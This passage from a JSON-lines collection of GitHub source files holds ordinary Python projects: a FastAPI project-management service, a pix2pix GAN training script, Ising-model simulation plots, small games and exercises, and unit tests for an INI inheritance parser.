+{"seq_id":"42143629507","text":"# from rest_framework.permissions import BasePermission\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_403_FORBIDDEN\n\n\ndef is_owner(obj, request):\n if obj.owner != request.user:\n return Response(\n {\n 'error': 'You do not have permission to perform this action'\n },\n status=HTTP_403_FORBIDDEN\n )\n\n\n# class IsOwner(BasePermission):\n# def has_object_permission(self, request, view, obj):\n# return obj and obj.owner == request.user","repo_name":"eldorjonneymatov/kanban","sub_path":"taskmanagement/api/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42781175645","text":"import numpy as np\nimport cv2\nimg1 = np.ones((480,640), dtype = np.uint8)*255\n\n#cv2.namedWindow(\"image1\", cv2.WINDOW_NORMAL)\n#cv2.imshow(\"image1\", img1)\n\n\nimg = cv2.imread(r'C:\\Users\\Maxim\\Desktop\\Faculty\\start\\artem.png')# ,0 for black-white\nheight, weight = img.shape[:2]\nprint(height, weight)\n#print(img)\n\n'''for x in range(weight):\n for y in range(height):\n if x%2==0 and y%2==0:\n img[y, x] = 0'''\n\nimg[height//2+20: height//2+40, weight//2-100:weight//2+10] = (255,255,0)\n\ncv2.imshow(\"image2\", img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"mkgs210/Computer_vision","sub_path":"les_1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21883512529","text":"def print_mes():\n print (\"\"\"Welcome to my game you will have much fun.You will be provided with a series of prompts to enter a word that satisfies the requested word type\n \n \"\"\")\n\n\ndef read_template(file_path):\n try:\n with open(file_path) as file:\n content=file.read()\n except FileNotFoundError :\n # raise FileNotFoundError('The path file not correct')\n return 'The path file not correct'\n return content.strip()\n\n\n\nimport re\n# import regex\n\ndef parse_template(template_string):\n text = tuple(re.findall('{(.*?)}',template_string)) \n # use tuble to convert [] to ()\n new_text = re.sub('{.*?}','{}',template_string)\n\n # print(text)\n # print(new_text)\n\n return new_text,text\n\ndef user_input(words):\n responses=[]\n\n for i in words:\n responses.append(input(f'insert a {i}:'))\n # print(responses)\n return(responses)\n\n\n\ndef merge(new_text,input_words):\n \n # Merging process : Replace the { } with the user input\n\n merged_text = new_text.format(*input_words)\n print (merged_text)\n return (merged_text)\n\ndef madlib_game():\n print_mes()\n read=read_template('assets/test.txt')\n parse_template(read)\n new_text,text=parse_template(read)\n input_words=user_input(text)\n merge(new_text,input_words)\n\nif __name__ == \"__main__\":\n # print(__name__)\n madlib_game()","repo_name":"Awonkhrais/madlib-cli","sub_path":"madlib_cli/madlib.py","file_name":"madlib.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9798292102","text":"n =1\nlista =[]\n\nwhile n != 0:\n n = int(input())\n for i in range(1, n + 1):\n lista.append(i)\n lista[i-1] = str(lista[i-1])\n i = i + i\n lista=' '.join(lista)\n if n!= 0: \n print(lista)\n lista =[]","repo_name":"gustavocruz-pereira/beecrowd-problems-python","sub_path":"Problems/Python/1146.py","file_name":"1146.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"11287228707","text":"import sys\nimport random\nimport utils\nimport grid_ising as grid\nimport matplotlib.pyplot as plt\nfrom math import log, sqrt\n\nrandom.seed(None)\n\nif len(sys.argv) != 4:\n sys.exit(\"Usage: grid_cftp.py grid_dim step_size max_iters\")\n\ndim = int(sys.argv[1])\nshape = (dim, dim)\nstep_size = float(sys.argv[2])\nmax_iters = int(sys.argv[3])\n\nb_crit = log(1+sqrt(2)) / 2\nplt.xlim(right=(b_crit + step_size))\nplt.ylim(top=max_iters)\nbvals, bsteps = utils.simulate(grid.CFTP(grid.heat_bath_flip, shape, max_iters), step_size)\nplt.plot(bvals, bsteps, color=\"darkorange\", label=\"Heat bath\")\nplt.annotate(\n \"β={:.2f}\".format(bvals[-1]),\n xy=(bvals[-1], bsteps[-1]),\n textcoords=\"offset points\",\n xytext=(0,5),\n ha='right',\n color=\"darkorange\")\nbvals, bsteps = utils.simulate(grid.CFTP(grid.metropolis_flip, shape, max_iters), step_size)\nplt.plot(bvals, bsteps, color = \"steelblue\", label=\"Metropolis filter\")\nplt.annotate(\n \"β={:.2f}\".format(bvals[-1]),\n xy=(bvals[-1], bsteps[-1]),\n textcoords=\"offset points\",\n xytext=(0,15),\n ha='right',\n color=\"steelblue\")\nplt.xlabel(\"Temperature β\")\nplt.ylabel(\"Mixing time (in MC steps)\")\nplt.title(\"{:d}x{:d} grid Ising CFTP\".format(dim,dim))\nplt.axvline(x = b_crit, color = 'r', linestyle = '-', label=\"Critical β\")\nplt.annotate(\n \"β={:.2f}\".format(b_crit),\n xy=(b_crit, max_iters),\n textcoords=\"offset points\",\n xytext=(0, -15),\n ha='right',\n color=\"red\")\nplt.legend(loc=\"upper left\")\nplt.savefig(\"grid_cftp{:d}x{:d}.png\".format(dim,dim))\n","repo_name":"ucsb/kevinl-f22-dimap","sub_path":"python/grid_cftp.py","file_name":"grid_cftp.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42486922089","text":"import os\nimport shutil\nimport sys\nfrom typing import Optional, List\n\nfrom fastapi import HTTPException, UploadFile\nfrom icecream import ic\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm import Session\n\nimport src.user.models as models_user\nimport src.user.schemas as schemas_user\nfrom src.base.service import CRUDBase\nfrom src.project import models\nfrom src.project import schemas\n\n\nclass CRUDProject(CRUDBase):\n def get_project_by_name(self, db_session: Session, project_name: str):\n return db_session.query(models.Project).filter(models.Project.name == project_name).first()\n\n def get_links_by_id_project(self, db_session: Session, project_id: int) -> Optional[schemas.Project_links_in_db]:\n return db_session.query(models.Project_link).filter(models.Project_link.id_project == project_id).all()\n\n def get_status_projects(self, db_session: Session, flag: bool) -> List[Optional[schemas.Project_links_in_db]]:\n return db_session.query(models.Project).filter(models.Project.status == flag).all()\n\n def get_team_project_by_project_id(self, db_session: Session, project_id: int) -> List[Optional[schemas_user.User]]:\n \"\"\"\n функция возвращает тим лида и команду разработки проекта\n :param db_session: ссесия БД\n :param project_id: id проекта\n :return: команду проекта\n \"\"\"\n project_team = db_session.query(models_user.User).select_from(models.Project_team) \\\n .join(models_user.User).filter(models.Project_team.project_id == project_id).all()\n return project_team\n\n\n def get_team_lead_project_by_project_id(self, db_session: Session, project_id: int) -> Optional[schemas_user.User]:\n project_team_lead = db_session.query(models_user.User).select_from(models.Project). \\\n join(models_user.User).filter(models.Project.id == project_id).first()\n return project_team_lead\n\n\n def get_user_project_by_user_id(self, db_session: Session, user_id: int) -> List[\n \"Optional[schemas.Project_base_in_db]\"]:\n project = db_session.query(models.Project_team).filter(models.Project_team.user_id == user_id).all()\n user_projects = []\n for i in project:\n user_projects.append(db_session.query(models.Project).filter(models.Project.id == i.project_id).first())\n return user_projects\n\n def get_file_by_id(self, db_session: Session, file_id: int):\n return db_session.query(models.Project_file).filter(models.Project_file.id == file_id).first()\n\n def get_files_project_by_project_id(self, db_session: Session, project_id: int) -> List[\n Optional[schemas.Project_files_in_db]]:\n return db_session.query(models.Project_file).filter(models.Project_file.id_project == project_id).all()\n\n def path_validation(self, project_name: str):\n root_dir = os.path.dirname(sys.modules['__main__'].__file__)\n if os.path.exists(f\"{root_dir}\\\\projects\"):\n pass\n else:\n os.mkdir(f\"{root_dir}\\\\projects\")\n\n if os.path.exists(f\"{root_dir}\\\\projects\\\\{project_name}\"):\n pass\n else:\n os.mkdir(f\"{root_dir}\\\\projects\\\\{project_name}\")\n path_project = f\"{root_dir}\\\\projects\\\\{project_name}\"\n return path_project\n\n def create(self, db_session: Session, obj_in: schemas.Project_create, files: list = None) -> Optional[\n schemas.Project_base_in_db]:\n try:\n project = models.Project(name=obj_in.name, customer=obj_in.customer,\n project_start=obj_in.project_start, project_completion=obj_in.project_completion,\n description=obj_in.description, path_design_documents=obj_in.path_design_documents,\n team_lead=obj_in.team_lead, status=True)\n db_session.add(project)\n db_session.flush()\n project_id = self.get_project_by_name(db_session, obj_in.name)\n\n db_session.query(models_user.User).filter(models_user.User.id == obj_in.team_lead). \\\n update({models_user.User.busy_status: True})\n\n for i in obj_in.team:\n db_session.query(models_user.User).filter(models_user.User.id == i). \\\n update({models_user.User.busy_status: True})\n team_project = models.Project_team(project_id=project_id.id, user_id=i)\n db_session.add(team_project)\n db_session.commit()\n return project\n except Exception as ex:\n db_session.rollback()\n raise HTTPException(status_code=400, detail=f\"{ex.args}\")\n\n def update_by_project_id(self, db_session: Session, obj_in: schemas.Project_update, project_id: int) -> Optional[\n schemas.Project_update]:\n try:\n db_session.query(models.Project).filter(models.Project.id == project_id).update({\n models.Project.name: obj_in.name, models.Project.customer: obj_in.customer,\n models.Project.project_start: obj_in.project_start,\n models.Project.project_completion: obj_in.project_completion,\n models.Project.description: obj_in.description,\n models.Project.path_design_documents: obj_in.path_design_documents,\n models.Project.team_lead: obj_in.team_lead})\n db_session.flush()\n for i in obj_in.team:\n team_project = models.Project_team(project_id=project_id, user_id=i)\n db_session.add(team_project)\n db_session.commit()\n return obj_in\n except IntegrityError as ex:\n db_session.rollback()\n raise HTTPException(status_code=400,\n detail=f\"id пользователя которого вы хотите добавить в команду не найден\\n{ex}\")\n\n def closing_project_by_id(self, db_session: Session, project_id: int) -> Optional[schemas.Project_base_in_db]:\n try:\n db_session.query(models.Project).filter(models.Project.id == project_id). \\\n update({models.Project.status: False})\n db_session.flush()\n project_team = self.get_team_project_by_project_id(db_session, project_id)\n for user in project_team[1:]:\n ic(user.id)\n db_session.query(models_user.User).filter(models_user.User.id == user.id). \\\n update({models_user.User.busy_status: False})\n db_session.commit()\n except Exception as ex:\n ic(ex)\n db_session.rollback()\n\n def add_links_project(self, db_session: Session, obj_in: schemas.Project_links, project_id: int):\n for i in obj_in:\n req = models.Project_link(id_project=project_id, link=i.link, description=i.description)\n db_session.add(req)\n db_session.commit()\n db_session.refresh(req)\n\n def delete_link(self, db_session: Session, project_id: int, link_id: int):\n req = db_session.query(models.Project_link).filter(models.Project_link.id_project == project_id,\n models.Project_link.id == link_id).first()\n db_session.delete(req)\n db_session.commit()\n\n def file_validator(self, db_session: Session, file_name: str):\n return db_session.query(models.Project_file).filter(models.Project_file.file_name == file_name).first()\n\n def add_files_project_by_project_id(self, db_session: Session, project_id: int, file: UploadFile,\n path_project: str):\n try:\n req = models.Project_file(id_project=project_id, path_project=path_project, file_name=file.filename,\n content_type=file.content_type)\n db_session.add(req)\n db_session.commit()\n with open(f\"{path_project}/{file.filename}\", \"wb\") as buffer:\n shutil.copyfileobj(file.file, buffer)\n except Exception as ex:\n ic(ex)\n db_session.rollback()\n\n def delete_file_by_project_id(self, db_session: Session, project_id: int, file_id: int):\n # TODO: реализовать архив, т.е. после удаления файла, файл помещается в архив, который удаляется раз в 30 дней\n try:\n project_file = db_session.query(models.Project_file).filter(models.Project_file.id_project == project_id,\n models.Project_file.id == file_id).first()\n db_session.delete(project_file)\n db_session.flush()\n os.remove(project_file.path_file)\n except Exception as ex:\n ic(ex)\n db_session.rollback()\n\n\ncrud_project = CRUDProject(models.Project)\n","repo_name":"Dolgopolovww/HTW_manager","sub_path":"src/project/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":8992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"20357787735","text":"import torch\r\nimport torch.nn as nn\r\nimport torchvision.transforms as transforms\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport torchvision.datasets as dset\r\nfrom .data import image_manipulation\r\nfrom .data import dataloader as img_dataloader\r\nfrom torch.autograd import Variable\r\nfrom tqdm import tqdm\r\nfrom PIL import Image\r\n\r\n\r\ndef weights_init_normal(m):\r\n classname = m.__class__.__name__\r\n if classname.find(\"Conv\") != -1:\r\n torch.nn.init.normal_(m.weight.data, 0.0, 0.02)\r\n elif classname.find(\"BatchNorm2d\") != -1:\r\n torch.nn.init.normal_(m.weight.data, 1.0, 0.02)\r\n torch.nn.init.constant_(m.bias.data, 0.0)\r\n\r\nclass UNetDown(nn.Module):\r\n def __init__(self, in_size, out_size, normalize = True, dropout = 0.0):\r\n super(UNetDown, self).__init__()\r\n layers = [\r\n nn.Conv2d(in_size, out_size, 4, 2, 1, bias = False)\r\n ]\r\n if normalize:\r\n layers.append(nn.InstanceNorm2d(out_size))\r\n \r\n layers.append(nn.LeakyReLU(0.2))\r\n \r\n if dropout:\r\n layers.append(nn.Dropout(dropout))\r\n \r\n self.model = nn.Sequential(*layers)\r\n \r\n def forward(self, x):\r\n return self.model(x)\r\n\r\nclass UNetUp(nn.Module):\r\n def __init__(self, in_size, out_size, dropout = 0.0):\r\n super(UNetUp, self).__init__()\r\n\r\n layers = [\r\n nn.ConvTranspose2d(in_size, out_size, 4, 2, 1, bias=False),\r\n nn.InstanceNorm2d(out_size),\r\n nn.ReLU(inplace=True),\r\n ]\r\n if dropout:\r\n layers.append(nn.Dropout(dropout))\r\n\r\n self.model = nn.Sequential(*layers)\r\n \r\n \r\n def forward(self, x, skip_input):\r\n x = self.model(x)\r\n x = torch.cat((x, skip_input), 1)\r\n\r\n return x\r\n\r\nclass GeneratorUNet(nn.Module):\r\n def __init__(self, in_channels=3, out_channels=3):\r\n super(GeneratorUNet, self).__init__()\r\n \r\n self.down1 = UNetDown(in_channels, 64, normalize=False)\r\n self.down2 = UNetDown(64, 128)\r\n self.down3 = UNetDown(128, 256)\r\n self.down4 = UNetDown(256, 512, dropout=0.5)\r\n self.down5 = UNetDown(512, 512, dropout=0.5)\r\n self.down6 = UNetDown(512, 512, dropout=0.5)\r\n self.down7 = UNetDown(512, 512, dropout=0.5)\r\n self.down8 = UNetDown(512, 512, normalize=False, dropout=0.5)\r\n\r\n self.up1 = UNetUp(512, 512, dropout=0.5)\r\n self.up2 = UNetUp(1024, 512, dropout=0.5)\r\n self.up3 = UNetUp(1024, 512, dropout=0.5)\r\n self.up4 = UNetUp(1024, 512, dropout=0.5)\r\n self.up5 = UNetUp(1024, 256)\r\n self.up6 = UNetUp(512, 128)\r\n self.up7 = UNetUp(256, 64)\r\n\r\n self.final = nn.Sequential(\r\n nn.Upsample(scale_factor=2),\r\n nn.ZeroPad2d((1, 0, 1, 0)),\r\n nn.Conv2d(128, out_channels, 4, padding=1),\r\n nn.Tanh(),\r\n )\r\n\r\n def forward(self, x):\r\n # U-Net generator with skip connections from encoder to decoder\r\n d1 = self.down1(x)\r\n d2 = self.down2(d1)\r\n d3 = self.down3(d2)\r\n d4 = self.down4(d3)\r\n d5 = self.down5(d4)\r\n d6 = self.down6(d5)\r\n d7 = self.down7(d6)\r\n d8 = self.down8(d7)\r\n \r\n # unet connections\r\n u1 = self.up1(d8, d7)\r\n u2 = self.up2(u1, d6)\r\n u3 = self.up3(u2, d5)\r\n u4 = self.up4(u3, d4)\r\n u5 = self.up5(u4, d3)\r\n u6 = self.up6(u5, d2)\r\n u7 = self.up7(u6, d1)\r\n\r\n return self.final(u7)\r\n\r\nclass Discriminator(nn.Module):\r\n def __init__(self, in_channels=3):\r\n super(Discriminator, self).__init__()\r\n\r\n def discriminator_block(in_filters, out_filters, normalization=True):\r\n \"\"\"Returns downsampling layers of each discriminator block\"\"\"\r\n layers = [nn.Conv2d(in_filters, out_filters, 4, stride=2, padding=1)]\r\n if normalization:\r\n layers.append(nn.InstanceNorm2d(out_filters))\r\n layers.append(nn.LeakyReLU(0.2, inplace=True))\r\n return layers\r\n\r\n self.model = nn.Sequential(\r\n *discriminator_block(in_channels * 2, 64, normalization=False),\r\n *discriminator_block(64, 128),\r\n *discriminator_block(128, 256),\r\n *discriminator_block(256, 512),\r\n nn.ZeroPad2d((1, 0, 1, 0)),\r\n nn.Conv2d(512, 1, 4, padding=1, bias=False),\r\n nn.Sigmoid()\r\n )\r\n\r\n def forward(self, img_A, img_B):\r\n # Concatenate image and condition image by channels to produce input\r\n img_input = torch.cat((img_A, img_B), 1)\r\n return self.model(img_input)\r\n\r\n# ## Model Train\r\n\r\nif __name__ == \"__main__\":\r\n torch.cuda.is_available()\r\n\r\n # random seed for reproducibility\r\n random_seed = 69\r\n\r\n np.random.seed(random_seed)\r\n\r\n # no of workers for dataloader\r\n no_of_workers = 4\r\n\r\n # root of the data\r\n data_root = \"data/train/\"\r\n\r\n # batch size\r\n batch_size = 1\r\n\r\n #no of epochs\r\n n_epochs = 10\r\n\r\n # learning rate\r\n lr = 0.0002\r\n\r\n # betas for adam\r\n beta_1 = 0.5\r\n beta_2 = 0.999\r\n\r\n # image size\r\n image_height = 256\r\n image_width = 256\r\n\r\n # We can use an image folder dataset the way we have it setup.\r\n # Create the dataset\r\n dataset = dset.ImageFolder(root=data_root,\r\n transform=transforms.Compose([\r\n transforms.ToTensor(),\r\n ]))\r\n # Create the dataloader\r\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=True,\r\n num_workers = no_of_workers)\r\n #initialize model classes\r\n generator = GeneratorUNet()\r\n discriminator = Discriminator()\r\n\r\n\r\n # check if cuda is avialbale\r\n cuda = True if torch.cuda.is_available() else False\r\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\r\n print(cuda)\r\n\r\n # initialize weights if the model is not found in the paths\r\n if os.path.exists(\"saved_models/generator_49.pth\"):\r\n print(\"Generator Found\")\r\n generator.load_state_dict(torch.load(\"saved_models/generator_49.pth\", map_location = device))\r\n else:\r\n generator.apply(weights_init_normal)\r\n \r\n if os.path.exists(\"saved_models/discriminator_49.pth\"):\r\n print(\"Discriminator Found\")\r\n discriminator.load_state_dict(torch.load(\"saved_models/discriminator_49.pth\", map_location = device))\r\n else:\r\n discriminator.apply(weights_init_normal)\r\n\r\n # model loss functions\r\n loss_fn_generator = torch.nn.MSELoss() # mean squared loss\r\n loss_fn_disc = torch.nn.L1Loss() #pixel wise loss\r\n\r\n # to cuda if cuda is avaiable\r\n generator.to(device)\r\n discriminator.to(device)\r\n loss_fn_disc.to(device)\r\n loss_fn_generator.to(device)\r\n \r\n # optimizers\r\n optimier_G = torch.optim.Adam(generator.parameters(), betas=(beta_1, beta_2), lr=lr)\r\n optimier_D = torch.optim.Adam(discriminator.parameters(), betas=(beta_1, beta_2), lr=lr)\r\n\r\n # Loss weight of L1 pixel-wise loss between translated image and real image\r\n lambda_pixel = 100\r\n\r\n # Calculate output of image discriminator (PatchGAN)\r\n patch = (1, image_height // 2 ** 4, image_width // 2 ** 4)\r\n\r\n # Tensor type\r\n Tensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor\r\n\r\n transform = transforms.Compose([\r\n transforms.ToTensor(), # transform to tensor\r\n transforms.Resize((image_width, image_height)) # Resize the image to constant size\r\n ])\r\n\r\n # create a dataloader\r\n pair_image_dataloader = img_dataloader.ImageDataset(\"./data/train_2/old_images\", \"./data/train_2/reconstructed_images\", transform)\r\n\r\n for epoch in range(1):\r\n for i, batch in tqdm(enumerate(pair_image_dataloader)):\r\n real_A = batch['A'].unsqueeze(0) # old image\r\n real_B = batch['B'].unsqueeze(0) # new image\r\n \r\n # train generator\r\n optimier_G.zero_grad()\r\n \r\n # Adversarial ground truths\r\n valid = Variable(Tensor(np.ones((real_A.size(0), *patch))), requires_grad=False) # ground truth for valid\r\n fake = Variable(Tensor(np.zeros((real_A.size(0), *patch))), requires_grad=False) # ground truth for invalid\r\n \r\n \r\n # GAN loss\r\n fake_B = generator(real_A.to(device)) # fake sample generated by generator\r\n pred_fake = discriminator(fake_B.to(device), real_B.to(device)) # prediction using discriminator\r\n loss_generator = loss_fn_generator(pred_fake.to(device), valid.to(device)) # check if the sample is valid or not\r\n \r\n loss_pixel = loss_fn_disc(fake_B.to(device), real_B.to(device)) # calculate the pixel wise loss\r\n \r\n # total loss\r\n loss_G = loss_generator + lambda_pixel * loss_pixel # total loss of the generator\r\n \r\n loss_G.backward()\r\n optimier_G.step()\r\n \r\n ## Train discriminator\r\n optimier_D.zero_grad()\r\n \r\n # Real loss\r\n pred_real = discriminator(real_B.to(device), real_A.to(device)) # loss to check real or not\r\n loss_real = loss_fn_generator(pred_real, valid)\r\n\r\n # Fake loss\r\n pred_fake = discriminator(fake_B.detach().to(device), real_A.to(device)) # loss to check fake or not\r\n loss_fake = loss_fn_generator(pred_fake.to(device), fake.to(device))\r\n\r\n # Total loss\r\n loss_D = 0.5 * (loss_real + loss_fake) # total loss of the discriminator\r\n \r\n loss_D.backward()\r\n optimier_D.step()\r\n \r\n # for logging\r\n if i % 100 == 0 and i:\r\n print(f\"Generator Error: {torch.linalg.norm(loss_G).item()}, epoch: {epoch}, itr: {i}\")\r\n print(f\"Discriminator Error: {torch.linalg.norm(loss_D).item()}, epoch: {epoch}, itr: {i}\")\r\n \r\n # train with only 5000 images\r\n if i % 500 == 0 and i > 0:\r\n break\r\n\r\n\r\n torch.save(generator.state_dict(), \"saved_models/generator.pth\")\r\n torch.save(discriminator.state_dict(), \"saved_models/discriminator.pth\")\r\n","repo_name":"Imsanskar/Old-image-restoration-minor","sub_path":"webpage/pix2pix/pix2pix.py","file_name":"pix2pix.py","file_ext":"py","file_size_in_byte":10404,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"79"} +{"seq_id":"23966446869","text":"from django.shortcuts import redirect, render\nfrom .forms import NewsletterSubscribeForm\nfrom .models import Newsletter\n\n\ndef newsletter_list(request):\n\n user = None\n \n if request.method == 'POST':\n form = NewsletterSubscribeForm(request.POST, user=user)\n if form.is_valid():\n form.subscribe(request)\n return redirect('home')\n else:\n form = NewsletterSubscribeForm(user=user)\n\n return render(request, 'newsletters/newsletter_list.html', {\n 'newsletters': Newsletter.objects.all(),\n 'form': form\n })\n","repo_name":"SmallsLIVE/smallslive","sub_path":"smallslive/newsletters/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"} +{"seq_id":"166182289","text":"from modules.object import Object\n\nclass Door(Object):\n\tdef __init__(self, image, x, y, width, height, color, pk=None):\n\t\tsuper().__init__(image, x, y, width, height, color, pk)\n\t\tself.start_x = x\n\t\tself.start_y = y\n\t\tself.closed = False\n\t\tself.counter = self.hitbox.height\n\t\n\tdef open(self, level_arm):\n\t\tif self.closed == False:\n\t\t\tif level_arm.pk == self.pk and level_arm.is_on == True:\n\t\t\t\tlevel_arm.color = (0,255,0)\n\t\t\t\tif self.counter > 0:\n\t\t\t\t\tself.hitbox.y -= 1\n\t\t\t\t\tself.counter -= 1\n\t\t\t\telse:\n\t\t\t\t\tself.counter = self.hitbox.height\n\t\t\t\t\tself.closed = True\n\t\t\t\t\tlevel_arm.is_on = False\n\t\telse:\n\t\t\tif level_arm.pk == self.pk and level_arm.is_on == True:\n\t\t\t\tlevel_arm.color = (255,0,0)\n\t\t\t\tif self.counter > 0:\n\t\t\t\t\tself.hitbox.y += 1\n\t\t\t\t\tself.counter -= 1\n\t\t\t\telse:\n\t\t\t\t\tself.counter = self.hitbox.height\n\t\t\t\t\tself.closed = False\n\t\t\t\t\tlevel_arm.is_on = False\n","repo_name":"Tripchanski/Christmas_Adventure_2023","sub_path":"modules/door.py","file_name":"door.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"} +{"seq_id":"411335516","text":"import unittest\nimport io\nimport textwrap\n\nimport six\n\nfrom .parser import Loader, ConfigParser, SafeConfigParser\n\n#------------------------------------------------------------------------------\nclass ByteLoader(Loader):\n def __init__(self, *args, **kw):\n self.items = dict()\n self.items.update(*args, **kw)\n def load(self, name, encoding=None):\n if name not in self.items:\n raise IOError(2, 'No such file or directory', name)\n ret = six.StringIO(self.items[name])\n ret.name = name\n return ret\n\n#------------------------------------------------------------------------------\nclass TestIniherit(unittest.TestCase):\n\n maxDiff = None\n\n #----------------------------------------------------------------------------\n def test_iniherit(self):\n files = {k: textwrap.dedent(v) for k, v in {\n 'base.ini' : '''\n [DEFAULT]\n kw1 = base-kw1\n kw2 = base-kw2\n [section]\n test1 = only in base, the value \"%(kw1)s\" should be \"base-kw1\"\n test2 = the value \"%(kw2)s\" should be \"base-kw2\"\n ''',\n 'extend.ini' : '''\n [DEFAULT]\n %inherit = base.ini\n kw1 = extend-kw1\n ''',\n }.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('extend.ini')\n self.assertEqual(parser.get('DEFAULT', 'kw1'), 'extend-kw1')\n self.assertEqual(parser.get('DEFAULT', 'kw2'), 'base-kw2')\n self.assertEqual(parser.get('section', 'test1'),\n 'only in base, the value \"extend-kw1\" should be \"base-kw1\"')\n self.assertEqual(parser.get('section', 'test2'),\n 'the value \"base-kw2\" should be \"base-kw2\"')\n self.assertFalse(parser.has_option('DEFAULT', '%inherit'))\n\n #----------------------------------------------------------------------------\n def test_iniherit_multiple(self):\n files = {k: textwrap.dedent(v) for k, v in {\n 'base.ini' : '''\n [DEFAULT]\n kw1 = base-kw1\n kw2 = base-kw2\n kw3 = base-kw3\n kw4 = base-kw4\n ''',\n 'override.ini' : '''\n [DEFAULT]\n kw2 = override-kw2\n kw3 = override-kw3\n kw5 = override-kw5\n ''',\n 'extend.ini' : '''\n [DEFAULT]\n %inherit = base.ini ?no-such-ini.ini override.ini\n kw1 = extend-kw1\n kw3 = extend-kw3\n kw6 = extend-kw6\n ''',\n }.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('extend.ini')\n self.assertEqual(parser.get('DEFAULT', 'kw1'), 'extend-kw1')\n self.assertEqual(parser.get('DEFAULT', 'kw2'), 'override-kw2')\n self.assertEqual(parser.get('DEFAULT', 'kw3'), 'extend-kw3')\n self.assertEqual(parser.get('DEFAULT', 'kw4'), 'base-kw4')\n self.assertEqual(parser.get('DEFAULT', 'kw5'), 'override-kw5')\n self.assertEqual(parser.get('DEFAULT', 'kw6'), 'extend-kw6')\n\n #----------------------------------------------------------------------------\n def test_iniherit_noSuchFile(self):\n files = {k: textwrap.dedent(v) for k, v in {\n 'base.ini' : '[DEFAULT]\\nkw1 = base-kw1\\n',\n 'extend.ini' : '[DEFAULT]\\n%inherit = base.ini no-such-ini.ini\\nkw2 = extend-kw2\\n',\n }.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n self.assertRaises(IOError, parser.read, 'extend.ini')\n\n #----------------------------------------------------------------------------\n def test_iniherit_relativePath(self):\n files = {k: textwrap.dedent(v) for k, v in {\n 'dir/base.ini' : '[section]\\nkw1 = base-kw1\\n',\n 'dir/mid.ini' : '[DEFAULT]\\n%inherit = base.ini\\n[section]\\nkw2 = mid-kw2\\n',\n 'extend.ini' : '[DEFAULT]\\n%inherit = dir/mid.ini\\n[section]\\nkw3 = extend-kw3\\n',\n }.items()}\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('extend.ini')\n self.assertEqual(parser.get('section', 'kw1'), 'base-kw1')\n self.assertEqual(parser.get('section', 'kw2'), 'mid-kw2')\n self.assertEqual(parser.get('section', 'kw3'), 'extend-kw3')\n\n #----------------------------------------------------------------------------\n def test_iniherit_inheritTargetInterpolation(self):\n files = {k: textwrap.dedent(v) for k, v in {\n 'base-without-interpolation.ini' : '''\n [DEFAULT]\n %inherit = dir/foo.ini\n code = foo\n [section]\n %inherit = dir/bar.ini\n code = %(ENV:THECODE:-noexist)s\n ''',\n 'base-with-interpolation.ini' : '''\n [DEFAULT]\n %inherit = dir/%(code)s.ini\n code = foo\n [section]\n %inherit = dir/%(ENV:THECODE:-noexist)s.ini\n code = %(ENV:THECODE:-noexist)s\n ''',\n 'base-with-cascading-interpolation.ini' : '''\n [DEFAULT]\n %inherit = dir/%(code)s.ini\n code = foo\n [section]\n %inherit = dir/%(code)s.ini\n code = %(ENV:THECODE:-noexist)s\n ''',\n 'dir/foo.ini' : '''\n [DEFAULT]\n value = it-is-foo\n ''',\n 'dir/bar.ini' : '''\n [section]\n value = it-is-bar\n ''',\n }.items()}\n import os\n os.environ['THECODE'] = 'bar'\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('base-without-interpolation.ini')\n self.assertEqual(parser.get('DEFAULT', 'value'), 'it-is-foo')\n self.assertEqual(parser.get('DEFAULT', 'code'), 'foo')\n self.assertEqual(parser.get('section', 'value'), 'it-is-bar')\n self.assertEqual(parser.get('section', 'code'), 'bar')\n parser = ConfigParser(loader=ByteLoader(files))\n parser.read('base-with-interpolation.ini')\n self.assertEqual(parser.get('DEFAULT', 'value'), 'it-is-foo')\n self.assertEqual(parser.get('DEFAULT', 'code'), 'foo')\n self.assertEqual(parser.get('section', 'value'), 'it-is-bar')\n self.assertEqual(parser.get('section', 'code'), 'bar')\n # TODO: enable this when \"%inherit\" interpolation uses iniherit\n # interpolation for recursive interpolation...\n # parser = ConfigParser(loader=ByteLoader(files))\n # parser.read('base-with-cascading-interpolation.ini')\n # self.assertEqual(parser.get('DEFAULT', 'value'), 'it-is-foo')\n # self.assertEqual(parser.get('DEFAULT', 'code'), 'foo')\n # self.assertEqual(parser.get('section', 'value'), 'it-is-bar')\n # self.assertEqual(parser.get('section', 'code'), 'bar')\n\n #----------------------------------------------------------------------------\n def test_iniherit_nameWithSpace(self):\n files = {k: textwrap.dedent(v) for k, v in {\n 'base + space.ini' : '[DEFAULT]\\nkw=word\\n',\n 